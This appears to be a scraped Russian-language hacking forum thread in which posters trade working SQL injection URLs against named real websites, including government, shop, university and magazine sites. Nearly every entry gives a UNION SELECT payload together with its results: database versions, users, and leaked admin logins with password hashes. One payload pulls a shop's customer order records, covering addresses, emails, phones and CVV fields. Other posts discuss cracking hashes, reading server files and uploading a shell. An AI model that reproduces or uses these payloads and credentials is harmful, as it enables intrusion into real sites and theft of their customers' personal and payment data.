http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6-- 5.0.67-log - [email protected] - harlem_live http://www.dissentmagazine.org/online.php?id=-1+union+select+1,concat(version(),char(32,45,32),user(),char(32,45,32),database()),3,4,5,6,7,8,9,10-- 4.1.22 - dissent@localhost - dissent
Адрес: polutona.ru (89.108.64.84) Google PR 4 / 10 Яндекс тІЦ 500 Code: http://polutona.ru/?show=reflect&number=-25+union+select+1,concat_ws(0x203a20,user(),version(),database())+from+news/* User() polutonf_poluton@localhost Version() 4.1.22-log Database() polutonf_polutonf
yo.ru xxx.ru http://www.xxx.ru/admin admin:65536 password.ru password.ru/admin/admin.php frame.ru infra.ru хешш разшифруйте и будет шелл ) tonnel.ru lolbot.ru
Cageprisoners.com Code: http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,version(),5,6-- version - 5.0.45 Code: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+17,1-- - admins... Code: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,concat_ws(username,0x3a,password),5,6+from+admins-- Mr. Admin:QYYoUiD1cbIlTi2jPbgoQ0
www.lv - Латвийский каталог, PR6 http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/* http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(database(),1),1),3,4,5,6/* http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/**/from/**/resources/* database: t_welcome user: [email protected] version: 4.1.15-Debian_1ubuntu5-log http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(id,1),1),3,4,5,6/**/from/**/resources/* http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(lang,1),1),3,4,5,6/**/from/**/resources/* http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(url,1),1),3,4,5,6/**/from/**/resources/* http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/**/from/**/mysql.user/* Code: SELECT command denied to user 'welcome'@'92.240.65.129' for table 'user'
www.codurisursa.ro, тИЦ = 10 Code: http://www.codurisursa.ro/print.php?id=-1+union+select+1,2,3,user(),5,6,7,8,database(),10,version(),12,13,14,15,16,17,18,19,20,21,22-- version() - 5.0.67-community-log user() - scoduri_sc@localhost database() - scoduri_sc логины, хэши паролей админов и юзеров(все): Code: http://www.codurisursa.ro/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(id,0x3A,user,0x3A,password),10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+0,1-- 1:admin:e4ea62f22090e998738d70a407f86cfc:bdvm админка здесь: http://www.codurisursa.ro/admin.php ----------------------- www.postindustrial.net, тИЦ = 210 Code: http://www.postindustrial.net/content2/show_text.php?razdeli_id=0&table=books&sql=razdeli_show&lang=russian&books_id=-1+union+select+1,version(),database(),user(),5,6,7/* version() - 4.0.26 user() - [email protected] database() - wwwpostindustria ----------------------- www.uatm.com.ua, тИЦ = 110 Code: http://www.uatm.com.ua/show_art.php?who=-1+union+select+1,2,3,concat(version(),':',database(),':',user()),5/* version() - 4.0.27 database() - reg_registeredcomua user() - regcomua@localhost
Code: http://www.brotherblue.com/pages.php?pageid=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9+from+users/* логин/пасс: Code: planettech:plpIT3xz.Z.KE --------------------------------------------------------- Code: http://www.goodbetterbestler.com/get-mike.php?GetID=-126+union+select+1,2,concat_ws(0x3a,username,0x3a,password)+from+users/* логин/пасс: Code: mike:xxOUrOW68gTuM ---------------------------------------------------------- Code: http://www.simbin.se/news.php?newsid=-84+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password),5+from+users/* логин/пасс: Code: newsadmin:fb77bb3fb971d583ebb3cd8ddc61b299cecee108 ------------------------------------------------------------ The End! P.S.:Вроде не баян=) P.S.S.:Скоро насобираю ещё=)))
Вывод в <title> (магазинчик) Code: http://[COLOR=White][B]www.spectrumaudio.com[/B][/COLOR]/manprods.php?id=-69+UNION+SELECT+1,CONCAT(ordID,0x3a,ordSessionID,0x3a,ordName,0x3a,ordAddress,0x3a,ordCity,0x3a,ordState,0x3a,ordZip,0x3a,ordCountry,0x3a,ordEmail,0x3a,ordPhone,0x3a,ordShipName,0x3a,ordShipAddress,0x3a,ordShipCity,0x3a,ordShipState,0x3a,ordShipZip,0x3a,ordShipCountry,0x3a,ordAuthNumber,ordAuthNumber,0x3a,ordAffiliate,0x3a,ordPayProvider,0x3a,ordShipping,0x3a,ordStateTax,0x3a,ordCountryTax,0x3a,ordHSTTax,0x3a,ordHandling,0x3a,ordShipType,0x3a,ordTotal,0x3a,ordDate,0x3a,ordIP,0x3a,ordDiscount,0x3a,ordDiscountText,0x3a,ordExtra1,0x3a,ordExtra2,0x3a,ordAddInfo,0x3a,ordComLoc,0x3a,ordStatus,0x3a,ordStatusDate,0x3a,ordStatusInfo,0x3a,ordAddress2,0x3a,ordShipAddress2,0x3a,ordExtra3,0x3a,ordTrackNum,0x3a,ordAVS,0x3a,ordCVV,0x3a,ordInvoice,0x3a,ordShipCarrier),3,4+FROM+spect9_spectrumaudio.orders+limit+0,1--
Подскажите, как раскрутить скулю: Code: http://smartlip.com/symbian/fileshare/flist.php?cat=1' Вроебы инъекция есть, но что то даже рабочие поля найти не получается (
www.sestran.gov.uk Code: http://www.sestran.gov.uk/news/article.php?ID=-17+union+select+1,concat(email,0x3a,password),3,4,5,6,7+from+admin_users-- Version: 5.0.67-community User: Andy@localhost www.pancsoc.org.uk Code: http://www.pancsoc.org.uk/showmeeting.php?id=61+union+select+1,2,concat(username,0x2e,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+limit+1,1/* Version: 5.0.22-Debian_0ubuntu6.06.5-log User: Pancsoc@localhost www.rugby.gov.uk Code: http://www.rugby.gov.uk/site/custom_scripts/wcsc_display.php?groupid=-453+union+select+load_file(0x453A5C50726F6772616D2046696C65735C4170616368652047726F75705C417061636865325C6A6164755C7075626C69635F68746D6C5C736974655C696E636C756465735C666F6F7465722E706870),2,3,4/* Version: 4.1.21-community-nt User: ufs@localhost diglib.lib.utk.edu Code: http://diglib.lib.utk.edu/utj/browse.php?jid=1&vid=2&issid=5&aid=-211+union+select+1,2,3,4,5,sin(pi()/3)-- Version: 4.1.22 User: utjuser@localhost www.crefal.edu.mx Code: http://www.crefal.edu.mx/noticias/noticia1.php?pagina=1&id=-111+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12/* Version: 5.0.22 User: [email protected] www.boxclever.ca Code: http://www.boxclever.ca/news.php?id=75+and+1=3+union+select+1,2,convert(user(),binary),4,5/* Version: 4.1.13a User: boxclever.ca@localhost www.metroeast.org Code: http://www.metroeast.org/articles/show.php?id=-132+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables/* Version: 5.0.45 User: websitesql@localhost
Code: http://www.netsetup.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,userpass),5,6+from+auth_users-- логин/пасс: Code: harold:dfb5e2a33dc5372e6971b2dde90145ce Code: marc:3e3dcdc5cbb5196312d1e5def7b74806 Code: peter:2547b2647e4860b41b570ce658e6e24b Code: erwin:cbd6326b959161bc0234e9c549f77034 -------------------------------------------------------- The End Аварийное отключение компа=((( Остальные скули выложу поже...
http://hemuspartners.com/ask.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32),version(),user(),database()),7,8,9,10,11,12,13,14-- 5.0.67-community - stefanwo_partner@localhost - stefanwo_hemusprt http://www.computerclinic.on.ca/ask.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2-- 4.1.22-standard - rarmstrong_usr@localhost - rarmstrong_db http://www.esqway165.com/faq.php?id=-1+union+select+concat_ws(char(32,45,32),version(),user(),database()),2-- 4.1.22-standard-log - esqwa206@localhost - esqwa206_phpbb1 http://ppcolonic.com/ask.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7-- 5.0.41-community-log - ppcolonic_pspg@localhost - ppcolonic_db
Code: http://www.thebiggreen.net/article.php?id=952+and+1=0+union+select+1,@@version,3,4,5,6,7,8,9,10,11-- Code: http://www.mediatunisie.com/news-web-sites-tunis-tunisia.php?id=-6+union+select+1,version(),3,4/* Code: http://www.sitecom.com/reviews_view.php?review=Disk+ID+-+LN-117+Disk+ID+5+stars&reviewitem=null union all select 1,2,3,4,5,6,7,8,9,10-- Code: http://www.e-maximfashion.com/news.php?news_id=-2%20union%20all%20select%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10%20from%20admin%20-- Code: http://www.meshop.ws/detail.php?id=-2+union+select+1,2,3,concat(user,0x3e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--
d1aVOL root кавычки не фильтрует узнаем пути и сайты на сервере ) смотрим конфиг админки ну и самое главное пароли к админке: что за хеш? ну и конешно залитие шелла ) токо папку на запись остается наити тебе ) усе успешного вам хека!
http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,version(),3,4,5,6%60 http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,unhex(hex(GROUP_CONCAT(user_name,0x3A,password))),3,4,5,6+from+adm_users%60 Версия MySQL: 5.0.58 ------- Имя базы: traveleurope ------- Юзер: [email protected] ------- @@basedir: /usr/ ------- @@datadir: /var/lib/mysql/ ------- @@tmpdir: /tmp/ ------- @@version_compile_os: redhat-linux-gnu ------- mysql user: srv1 ------- mysql password: 6f14f6e867cffa2c
http://www.liberte-economie.com/edit.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13-- 5.0.51a-log - economie_base@localhost - economie
facebook.com Code: http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4-- Version: 5.0.67-community
